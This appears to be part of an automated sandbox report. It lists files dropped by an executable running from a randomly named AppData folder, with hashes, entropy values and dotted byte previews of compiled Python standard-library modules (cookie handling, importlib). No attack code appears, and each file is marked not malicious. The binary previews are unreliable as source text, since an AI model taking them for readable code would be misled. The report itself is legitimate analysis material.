                                                                                                                                                                                                            Preview:o.......Z.,d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):53464
                                                                                                                                                                                                            Entropy (8bit):5.564456187273416
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:lB95TRGXx0wM1oyXc63+Rb+TXzpTrY/hgRkOfmXULJn0MFgddqRGfUehMJutkvPK:jAI1FXZ+R+ZyhXd6x8MMT
                                                                                                                                                                                                            MD5:D55E816665F2BBA359EB226BF2B0FA3F
                                                                                                                                                                                                            SHA1:CC638A95FD703B12186FB0A182AB60C641F1E1DA
                                                                                                                                                                                                            SHA-256:AC00F27E6CC4938DFA36E92E84733F8993C548B29A1D4422935D4A31CBF0D5D9
                                                                                                                                                                                                            SHA-512:D9DA51A4950D4B23C8CFD79F11010A5C50D1D68A5AF40E6CD9DB7114674B4B90199572D61EC4F11F4F9276C14AE96A85D81D2DF7CEEC2BC73BEDA9AC0B56EA2D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):53464
                                                                                                                                                                                                            Entropy (8bit):5.564456187273416
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:lB95TRGXx0wM1oyXc63+Rb+TXzpTrY/hgRkOfmXULJn0MFgddqRGfUehMJutkvPK:jAI1FXZ+R+ZyhXd6x8MMT
                                                                                                                                                                                                            MD5:D55E816665F2BBA359EB226BF2B0FA3F
                                                                                                                                                                                                            SHA1:CC638A95FD703B12186FB0A182AB60C641F1E1DA
                                                                                                                                                                                                            SHA-256:AC00F27E6CC4938DFA36E92E84733F8993C548B29A1D4422935D4A31CBF0D5D9
                                                                                                                                                                                                            SHA-512:D9DA51A4950D4B23C8CFD79F11010A5C50D1D68A5AF40E6CD9DB7114674B4B90199572D61EC4F11F4F9276C14AE96A85D81D2DF7CEEC2BC73BEDA9AC0B56EA2D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15362
                                                                                                                                                                                                            Entropy (8bit):5.448226356353315
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:gO6ZJt/SHD+IfhNGV10wqP+6JdMYFGBCeA4Gm0Ir7bDQs61vwOQY2jxP+Qh3lL44:HWJtS+Ifh8D0wqP+6JdMYsBrA4GmzfbX
                                                                                                                                                                                                            MD5:1D8BFE474CAB9A2693F5A113790FE43E
                                                                                                                                                                                                            SHA1:A600CDB128A68299264CB8A864320672EFD65B2B
                                                                                                                                                                                                            SHA-256:8451D5272B1A68D8B24A488BC7C73D2490FC2C2C36CF771F34A2C0190E3BEFE3
                                                                                                                                                                                                            SHA-512:468D67DD9F562863A04F52C322051315356245C8354D451A3D625854401948B68A3E68C3FBB631183F7FAD4A1D4ADEEA2ED1B1BA8F54635DEB6E32D803B3A334
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dfR.......................@...sZ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j.Z.d.j.Z.d.j.Z.G.d.d...d.e...Z.e.j.e.j...d...Z.e.d...Z.d.d...e.e.d.....e.e.e.e.......D...Z.e...e.d...d.e.d...d.i.....e...d.e...e.......j.Z.d.d...Z.e...d...Z.e...d...Z.d.d...Z.g.d...Z.g.d...Z.d.e.e.f.d.d...Z.G.d.d...d.e ..Z!d.Z"e"d ..Z#e...d!e"..d"..e#..d#..e.j$e.j%B...Z&G.d$d%..d%e ..Z'G.d&d'..d'e'..Z(d.S.)(a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..Most of the time you start by creating a cookie... >>> C = cookies.SimpleCookie()..Once you've created your Cookie, you can add values just as if it were.a dictionary... >>> C = cookies.SimpleCookie(). >>> C["fig"] = "newton". >>> C["sugar"] = "wafer". >>> C.output(). 'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'..Notice that the printable representation of a Cookie is the.appropriate format for a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15362
                                                                                                                                                                                                            Entropy (8bit):5.448226356353315
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:gO6ZJt/SHD+IfhNGV10wqP+6JdMYFGBCeA4Gm0Ir7bDQs61vwOQY2jxP+Qh3lL44:HWJtS+Ifh8D0wqP+6JdMYsBrA4GmzfbX
                                                                                                                                                                                                            MD5:1D8BFE474CAB9A2693F5A113790FE43E
                                                                                                                                                                                                            SHA1:A600CDB128A68299264CB8A864320672EFD65B2B
                                                                                                                                                                                                            SHA-256:8451D5272B1A68D8B24A488BC7C73D2490FC2C2C36CF771F34A2C0190E3BEFE3
                                                                                                                                                                                                            SHA-512:468D67DD9F562863A04F52C322051315356245C8354D451A3D625854401948B68A3E68C3FBB631183F7FAD4A1D4ADEEA2ED1B1BA8F54635DEB6E32D803B3A334
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dfR.......................@...sZ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j.Z.d.j.Z.d.j.Z.G.d.d...d.e...Z.e.j.e.j...d...Z.e.d...Z.d.d...e.e.d.....e.e.e.e.......D...Z.e...e.d...d.e.d...d.i.....e...d.e...e.......j.Z.d.d...Z.e...d...Z.e...d...Z.d.d...Z.g.d...Z.g.d...Z.d.e.e.f.d.d...Z.G.d.d...d.e ..Z!d.Z"e"d ..Z#e...d!e"..d"..e#..d#..e.j$e.j%B...Z&G.d$d%..d%e ..Z'G.d&d'..d'e'..Z(d.S.)(a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..Most of the time you start by creating a cookie... >>> C = cookies.SimpleCookie()..Once you've created your Cookie, you can add values just as if it were.a dictionary... >>> C = cookies.SimpleCookie(). >>> C["fig"] = "newton". >>> C["sugar"] = "wafer". >>> C.output(). 'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'..Notice that the printable representation of a Cookie is the.appropriate format for a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3829
                                                                                                                                                                                                            Entropy (8bit):5.549510403691082
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:XuKEn4Gs1xwkB8/pIXEz66QncxK1p9W0j+VZzmF2Q8yIcOr:bEkCoMK1a0j+DmF2QZIh
                                                                                                                                                                                                            MD5:BD492FAFB8B64E9E71E0B95552AECD7C
                                                                                                                                                                                                            SHA1:971778B7F331DE44C418FF09694CEBFD1F8D1AD0
                                                                                                                                                                                                            SHA-256:5BA1BD9B1812A20AFAAAD5B265E5E8F0EBA8008DE5B4320FF9A72F343D24B755
                                                                                                                                                                                                            SHA-512:1DBEA1A9DAC4B7653D2D4EF6A73BBC3D636DDD81800A4CE999387E27407F4050AB3434341801E7197B36BCD8AA19A7484C781407E3DF2F7C0FA878FD682A4AAC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dy........................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y)......d.d.l.m.Z...e...e.e.....Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.yB......Y.n.w.e.e.j.d.<.z.d.d.l.Z.W.n...e.ye......d.d.l.m.Z...e...e.....e.e._.Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.y~......Y.n.w.e.e.j.d.<.e.j.Z.e.j.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.i.Z.d.d...Z.d.S.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....N.....)..._bootstrapz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py)..._bootstrap_externalz.importlib._bootstrap_externalz._bootstrap_external.py).r....c....................C...s"...t.j.D.].}.t.|.d...r.|.......q.d.S.).zmCall the invalidate_caches() method on all meta path finders stored in. sys.meta_path (where implemented).r....N)...sys..meta_path..hasattrr....)...finder..r.....AC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\__init__.pyr....A...s..............r....c...............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1995
                                                                                                                                                                                                            Entropy (8bit):5.0379588635185995
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lzGYO7KXEXsTqXrqj9FXHRLSVRibTAsKhnsRyy:/rEXpXrqhFXHPTbIsZ
                                                                                                                                                                                                            MD5:9C8A4E069BC975C718396D043B680100
                                                                                                                                                                                                            SHA1:702C81EA91B6E79F90ABE8CAFFDA0ACAF5B0ECF1
                                                                                                                                                                                                            SHA-256:3C2C2854FCAAD1A0338F7148C17D0AD2D1B7DB4047D44B5454ED4BA5073289CC
                                                                                                                                                                                                            SHA-512:47301F387B1F97793E71BCCCC79D6B2540CE345430FE1E8686E5202F53C4FC6EE7438499B7E0EE0FBEE82E23EB08B19883E42D789CB6325BE749E9880DE50342
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dr........................@...s8...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.G.d.d...d.e.j.d...Z.d.S.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...Loaderz'Abstract base class for import loaders.c....................C...s....d.S.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specr....r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\_abc.py..create_module....s......z.Loader.create_modulec....................C...s....t.|.d...s.t...t...|.|...S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properly. The fullname is a str... ImportError is raised on failu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3727
                                                                                                                                                                                                            Entropy (8bit):4.671037298609076
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ddi1hyWa11p/5cIBqNU79FhTEnKIgVFKOmuD79VsUKyO9WoK/UML9Qa:MhyWGfxxB99FhkKIgDKONrsUK39WoK/L
                                                                                                                                                                                                            MD5:4CBD1B1B9FE674B3C8BC7A7533369219
                                                                                                                                                                                                            SHA1:456E7FFBD44044C0577FDEB091F3986F5203A9C6
                                                                                                                                                                                                            SHA-256:EE8CDFA8D1D40DBA8BF8E7A466D8995300BDEA49D3DE8EE8BBDF6F09BE5D02F8
                                                                                                                                                                                                            SHA-512:BDAB35DBF28BF4B5989548105C862790B6FC966A75A8A6B3AE9B3DED0A33D1063BF0126AAD1B97BC464704BF3A6FB567DF93650657FF26984E6C2552C2AA696A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sN...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.S.)......)...suppress.....)...abcc....................@...s(...e.Z.d.Z.d.Z.d.d...f.d.d...Z.d.d...Z.d.S.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c....................C...s....|.j.S...N)...loader....spec..r.....BC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\_adapters.py..<lambda>....s......z.SpecLoaderAdapter.<lambda>c....................C...s....|.|._.|.|...|._.d.S.r....).r....r....)...selfr....Z.adapterr....r....r......__init__....s........z.SpecLoaderAdapter.__init__c....................C........t.|.j.|...S.r....)...getattrr......r......namer....r....r......__getattr__...........z.SpecLoaderAdapter.__getattr__N)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............r....c....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.)...TraversableResourcesLoaderz9. Adap
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2991
                                                                                                                                                                                                            Entropy (8bit):5.205803441720797
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ldfiZ38jH+kP4PY+IuyYalBABDu0ZLmJ2SOoHft3XlY2s03f/mm2vJviUeXrowab:jfipsH3AqYali7ZL7dillY2s033mm2vX
                                                                                                                                                                                                            MD5:E4AD1BE4EBF4A47CF3749342C49AA5A5
                                                                                                                                                                                                            SHA1:CECBE9E43387C1FB0E6A137222F8C81497339B00
                                                                                                                                                                                                            SHA-256:3DFAF0C5A074792926DB8331C16C2705E2F69B0E7B5DB5E4DED97410452072A8
                                                                                                                                                                                                            SHA-512:8C790D3AEC9F7CB07D988F81A9D26413FA1850420FD4208AE903C6F54088F26E72D08573A3C4E59D32B454CA91E8386FFA0828F739386E2BDFA37BB97B97D2E3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j.e.f...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.d.e.j.d...d.d.....Z.e.j.d.d.....Z.e...e.j...e.j.d.d.......Z d.S.)......N)...Union..Any..Optional.....)...ResourceReader..Traversable)...wrap_specc....................C...s....t.t.|.....S.).z3. Get a Traversable resource from a package. )...from_package..get_package)...package..r.....@C:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\_common.py..files....s......r....c....................C...s....t.|...}.t.j...|...\.}.}.|.r.t.|...d.......|.S.).z.Normalize a path by ensuring it is a string... If the resulting string contains path separators, an exception is raised.. z. must be only a file name)...str..os..path..split..ValueError).r....Z.str_path..parent..file_namer....r....r......normalize_path....s..............r....c....................C...s*...|.j.}.t.|.j.d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15915
                                                                                                                                                                                                            Entropy (8bit):5.108872990232223
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zzjB5HGaViuYo8vEVbFCibM/50LbCb1EVMXS6O9PzXDPJ8OoEAuDdPTaX/DOWP6s:zzDVnR8gC/50LbjVMA9PrWCDaX/P6s
                                                                                                                                                                                                            MD5:DE327959D4C796AE2B764D2E4250F357
                                                                                                                                                                                                            SHA1:13B226D82701A79CBD4B5A8ABC16A5765BE10C57
                                                                                                                                                                                                            SHA-256:485D57E523F1E154BAFB85D0A390D082759457D67522731D5BB26E03D0A9B4CF
                                                                                                                                                                                                            SHA-512:41CEE8FA0632AC5525473C3C631C15BD108A6FE107FDE976D7EC343355E9474AB081250DB7EFC4BC70C3E7BD7515A6E1A362F00415CC514D948EB878E4FFF62D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.:.......................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.y...Z...z.e.j.d.k.r"..d.Z.W.Y.d.Z.[.n.d.Z.[.w.w.z.d.d.l.Z.W.n...e.y@......e.Z.Y.n.w.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d...Z.G.d.d...d.e.j.d...Z.G.d.d...d.e.j.d...Z.e.e.e.j.e.j.e.j.e.j.....G.d.d...d.e.j.d...Z.e.e.e.j.....G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.e.j.e.j.....G.d.d...d.e...Z.e.e.e.j ....G.d.d...d.e.j!e.e...Z!e.e!e.j"e.j#....G.d.d...d.e.j$e.e...Z$e.e$e.j"....G.d.d...d.e.j.d...Z%e.G.d.d ..d e.....Z&G.d!d"..d"e%..Z'd.S.)#z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...BinaryIO..Iterable..Text)...Protocol..runtime_checkablec....................G...sZ...|.D.](}.|...|.....t.d.u.r*z.t.t.|.j...}.W.n...t.y$......t.t.|.j...}.Y.n.w.|...|.....q.d.S...N)...registerr......getattr..__name__..AttributeError.._frozen_importlib_external).Z.abstract_clsZ.classes..clsZ.frozen_cls..r.....<C:\Users\user\
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):968
                                                                                                                                                                                                            Entropy (8bit):5.414402015927617
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:lrjoXT16iGMJgQFpAquj8GifdXsrmH58K:lreG0Oqu05sr3K
                                                                                                                                                                                                            MD5:1ABCB8B314E9A54D5F72A3CF3E070476
                                                                                                                                                                                                            SHA1:2324B4A50F61B7F47515C5A14B284C46BC0381DC
                                                                                                                                                                                                            SHA-256:1754A61D4A5E737311AA6AAFD32AFD2BD76A7F4B3501BC8577DC5B7654BD0D34
                                                                                                                                                                                                            SHA-512:00045AC3221C4815561882A2453BEF434200830352B89F5C41485948891F977931FC5A1430B8EEA8614C8D803A511AE11B105181019648E424D49E66EB4CC2E2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dR........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.S.).z9The machinery of importlib: finders, loaders, hooks, etc......)...ModuleSpec)...BuiltinImporter)...FrozenImporter)...SOURCE_SUFFIXES..DEBUG_BYTECODE_SUFFIXES..OPTIMIZED_BYTECODE_SUFFIXES..BYTECODE_SUFFIXES..EXTENSION_SUFFIXES)...WindowsRegistryFinder)...PathFinder)...FileFinder)...SourceFileLoader)...SourcelessFileLoader)...ExtensionFileLoaderc....................C...s....t.t...t...S.).zAReturns a list of all recognized module suffixes for this process).r....r....r......r....r.....BC:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\machinery.py..all_suffixes....s......r....N)...__doc__.._bootstrapr....r....r......_bootstrap_externalr....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......<module>....s............................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5206
                                                                                                                                                                                                            Entropy (8bit):4.8811314096021645
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:zPv4oTQ1zsquRgowzdmCbBavWMPTjTzKuhXBoPTl906kEt7IQ7ClEXsjMptAWrxB:FQ1ztyvedlbB7IruuhXBoPTlK9EhIQOi
                                                                                                                                                                                                            MD5:5B1A082411FA676F95BBCA19E4EE963D
                                                                                                                                                                                                            SHA1:4D592CDA05237E966C213E269ABB4CBE490BD127
                                                                                                                                                                                                            SHA-256:7160A589B3E8C1541EA834A0CEE8ADD3B8929C8FA3AA3DD84F39C5A65E4531D0
                                                                                                                                                                                                            SHA-512:66A1F8CFBB07D0F053764CD82802853ED7E50A6CCC2125750CDA6D2E89A68A0DF098BE6968BC542FF5D4357F63BE77975DACC172E5C491E4AC528534623709BB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d~........................@...sx...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.)......N.....)...abcc....................C...s....t.t.j...|.....S...N)...iter..collections..OrderedDict..fromkeys)...items..r.....@C:\Users\user\AppData\Local\xFSOj9El1Q\lib\importlib\readers.py..remove_duplicates...........r....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...FileReaderc....................C...s....t...|.j...j.|._.d.S.r....)...pathlib..Path..path..parent)...self..loaderr....r....r......__init__....s......z.FileReader.__init__c....................C........t.|.j...|.....S...z{. Return the file system path to prevent. `resources.path()` from creating a temporary. copy.. ....strr......joinpath..r......resourcer....r....r......resource_path...........z.FileReader.resource_pathc....................C........|.j.S.r......r......r....r....r....r......files.........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5393
                                                                                                                                                                                                            Entropy (8bit):5.3439540379215735
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:5zYSudPIqJNGeMzW9dlfxV10JJgFGx6qjBfjO6y3SnKL49oNhbMrhKgTlv:5JBnS9xV1SJgGx6AjI3SKyhRTlv
                                                                                                                                                                                                            MD5:767A7C3C10ABAB419C970803961197B4
                                                                                                                                                                                                            SHA1:7DA3531E09AD77FED0F31679EA2848D1F14E9491
                                                                                                                                                                                                            SHA-256:0B75A9C1C8A7F0AFD2067994A031A6F9E6CC3E45003FA5F6BBA221E7E2FA5B38
                                                                                                                                                                                                            SHA-512:7086F5416A16B6CE56A1D5635C9C79294549061B97F8C7B5F6ADBAE9338EA6E3F9C91E20C9B618EB1CE51CD9F8B6ECEFC4990B3FA8917D19E3B49FEE63487D35
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z e.e!e.f...Z"e.e!e.j#f...Z$d.e"d.e$d.e.f.d.d...Z%....d3d.e"d.e$d.e!d.e!d.e.f.d.d...Z&d.e"d.e$d.e'f.d.d...Z(....d3d.e"d.e$d.e!d.e!d.e!f.d.d ..Z)d.e"d.e$d.d!f.d"d#..Z*d$d%..Z+d&d'..Z,d(d)..Z-d.e"d*e!d.e.f.d+d,..Z/d.e"d.e.e!..f.d-d...Z0e.d/d0....Z1e1.2e...d1d2....Z3d.S.)4.....N.....)..._common)...as_file..files)...ResourceReader)...suppress)...ResourceLoader)...ModuleSpec)...BytesIO..TextIOWrapper)...Path)...ModuleType)...ContextManager..Iterable..Union)...cast)...BinaryIO..TextIO)...Sequence)...singledispatch)...Package..Resourcer....r......contentsr......is_resource..open_binary..open_text..path..read_binary..read_text..package..resource..returnc....................C...s&...t...|...}.t...|...}.t...|...}.|.d.u.r.|...|...S.t.t.|.j...}.|
